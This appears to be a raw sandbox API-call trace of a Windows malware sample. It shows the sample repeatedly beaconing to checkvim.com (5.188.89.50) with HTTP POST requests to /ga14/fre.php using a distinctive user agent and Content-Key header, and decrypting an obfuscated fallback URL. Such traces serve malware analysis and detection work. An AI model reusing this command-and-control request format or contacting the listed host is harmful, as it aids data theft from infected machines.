RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0288.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.585] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0288.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.586] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0288.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0288.587] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0288.587] GetProcessHeap () returned 0x840000 [0288.587] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0288.587] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0288.589] GetProcessHeap () returned 0x840000 [0288.589] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0288.589] socket (af=2, type=1, protocol=6) returned 0x480 [0288.589] connect (s=0x480, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0288.658] FreeAddrInfoW (pAddrInfo=0x871470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0288.658] GetProcessHeap () returned 0x840000 [0288.658] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0288.658] GetProcessHeap () returned 0x840000 [0288.658] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0288.659] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0288.660] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0288.660] GetProcessHeap () returned 0x840000 [0288.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0288.660] GetProcessHeap () returned 0x840000 [0288.660] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0288.660] GetProcessHeap () returned 0x840000 [0288.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0288.660] GetProcessHeap () returned 0x840000 [0288.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0288.661] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0288.661] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0288.661] GetProcessHeap () returned 0x840000 [0288.661] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0288.661] GetProcessHeap () returned 0x840000 [0288.661] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0288.661] send (s=0x480, buf=0x873a58*, len=237, flags=0) returned 237 [0288.662] send (s=0x480, buf=0x87eb58*, len=159, flags=0) returned 159 [0288.662] GetProcessHeap () returned 0x840000 [0288.662] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0288.662] recv (in: s=0x480, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0289.020] GetProcessHeap () returned 0x840000 [0289.020] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0289.020] GetProcessHeap () returned 0x840000 [0289.020] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0289.020] GetProcessHeap () returned 0x840000 [0289.020] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0289.020] GetProcessHeap () returned 0x840000 [0289.020] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0289.020] closesocket (s=0x480) returned 0 [0289.020] GetProcessHeap () returned 0x840000 [0289.020] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0289.020] GetProcessHeap () returned 0x840000 [0289.020] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0289.020] GetProcessHeap () returned 0x840000 [0289.020] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0289.021] GetProcessHeap () returned 0x840000 [0289.021] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0289.021] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x34c) returned 0x480 [0289.022] Sleep (dwMilliseconds=0xea60) [0289.046] GetProcessHeap () returned 0x840000 [0289.046] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0289.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.047] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0289.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.054] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0289.061] GetProcessHeap () returned 0x840000 [0289.061] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0289.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.062] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0289.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.062] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0289.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.063] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0289.063] GetProcessHeap () returned 0x840000 [0289.063] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0289.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.064] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0289.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.065] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0289.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.066] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0289.066] GetProcessHeap () returned 0x840000 [0289.066] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0289.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.067] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0289.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.071] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0289.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.072] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0289.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.073] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0289.073] GetProcessHeap () returned 0x840000 [0289.073] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0289.073] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0289.073] GetProcessHeap () returned 0x840000 [0289.073] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0289.073] GetProcessHeap () returned 0x840000 [0289.073] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0289.073] GetProcessHeap () returned 0x840000 [0289.073] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0289.073] GetProcessHeap () returned 0x840000 [0289.073] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f830 [0289.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.074] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0289.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.078] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0289.082] GetProcessHeap () returned 0x840000 [0289.082] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0289.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.083] CryptImportKey (in: hProv=0x86f688, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0289.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.084] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0289.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.085] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0289.085] GetProcessHeap () returned 0x840000 [0289.085] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0289.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.086] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f830, pdwDataLen=0x19f9a4 | out: pbData=0x87f830, pdwDataLen=0x19f9a4) returned 1 [0289.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.087] CryptDestroyKey (hKey=0x87e270) returned 1 [0289.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.088] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0289.088] GetProcessHeap () returned 0x840000 [0289.088] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0289.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.089] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0289.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.090] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0289.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.091] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0289.091] GetProcessHeap () returned 0x840000 [0289.091] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871290 [0289.091] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0289.093] GetProcessHeap () returned 0x840000 [0289.093] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0289.093] socket (af=2, type=1, protocol=6) returned 0x484 [0289.093] connect (s=0x484, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0289.166] FreeAddrInfoW (pAddrInfo=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0289.166] GetProcessHeap () returned 0x840000 [0289.166] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f820 [0289.166] GetProcessHeap () returned 0x840000 [0289.166] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0289.166] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0289.167] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0289.167] GetProcessHeap () returned 0x840000 [0289.167] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0289.167] GetProcessHeap () returned 0x840000 [0289.167] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0289.167] GetProcessHeap () returned 0x840000 [0289.167] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc20 [0289.167] GetProcessHeap () returned 0x840000 [0289.167] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0289.168] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0289.169] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0289.169] GetProcessHeap () returned 0x840000 [0289.169] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0289.169] GetProcessHeap () returned 0x840000 [0289.169] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0289.169] send (s=0x484, buf=0x873a58*, len=237, flags=0) returned 237 [0289.169] send (s=0x484, buf=0x87eb58*, len=159, flags=0) returned 159 [0289.169] GetProcessHeap () returned 0x840000 [0289.169] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0289.169] recv (in: s=0x484, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0289.569] GetProcessHeap () returned 0x840000 [0289.569] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0289.569] GetProcessHeap () returned 0x840000 [0289.569] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0289.569] GetProcessHeap () returned 0x840000 [0289.570] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0289.570] GetProcessHeap () returned 0x840000 [0289.570] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f820 | out: hHeap=0x840000) returned 1 [0289.570] closesocket (s=0x484) returned 0 [0289.589] GetProcessHeap () returned 0x840000 [0289.589] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0289.589] GetProcessHeap () returned 0x840000 [0289.589] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0289.589] GetProcessHeap () returned 0x840000 [0289.589] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0289.589] GetProcessHeap () returned 0x840000 [0289.589] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871290 | out: hHeap=0x840000) returned 1 [0289.594] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x478) returned 0x484 [0289.613] Sleep (dwMilliseconds=0xea60) [0289.627] GetProcessHeap () returned 0x840000 [0289.627] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0289.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.628] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0289.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.635] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0289.641] GetProcessHeap () returned 0x840000 [0289.641] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0289.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.642] CryptImportKey (in: hProv=0x86ff90, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e330) returned 1 [0289.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.643] CryptSetKeyParam (hKey=0x87e330, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0289.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.643] CryptSetKeyParam (hKey=0x87e330, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0289.643] GetProcessHeap () returned 0x840000 [0289.643] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0289.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.644] CryptDecrypt (in: hKey=0x87e330, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0289.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.645] CryptDestroyKey (hKey=0x87e330) returned 1 [0289.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.646] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0289.646] GetProcessHeap () returned 0x840000 [0289.646] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0289.646] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.646] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0289.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.647] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0289.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.648] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0289.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.649] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0289.649] GetProcessHeap () returned 0x840000 [0289.649] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0289.649] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0289.649] GetProcessHeap () returned 0x840000 [0289.649] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0289.649] GetProcessHeap () returned 0x840000 [0289.649] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0289.649] GetProcessHeap () returned 0x840000 [0289.649] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0289.649] GetProcessHeap () returned 0x840000 [0289.649] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc20 [0289.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.650] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0289.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.653] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f930) returned 1 [0289.657] GetProcessHeap () returned 0x840000 [0289.657] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0289.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.658] CryptImportKey (in: hProv=0x86f930, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0289.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.659] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0289.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.659] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0289.659] GetProcessHeap () returned 0x840000 [0289.659] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0289.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.660] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc20, pdwDataLen=0x19f9a4 | out: pbData=0x87fc20, pdwDataLen=0x19f9a4) returned 1 [0289.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.661] CryptDestroyKey (hKey=0x87e930) returned 1 [0289.662] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0289.662] CryptReleaseContext (hProv=0x86f930, dwFlags=0x0) returned 1 [0289.662] GetProcessHeap () returned 0x840000 [0289.662] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0289.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.663] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0289.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.663] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0289.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0289.664] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0289.664] GetProcessHeap () returned 0x840000 [0289.664] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0289.664] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0289.666] GetProcessHeap () returned 0x840000 [0289.666] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c48 [0289.666] socket (af=2, type=1, protocol=6) returned 0x488 [0289.666] connect (s=0x488, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0289.736] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0289.736] GetProcessHeap () returned 0x840000 [0289.736] RtlAllocateHeap 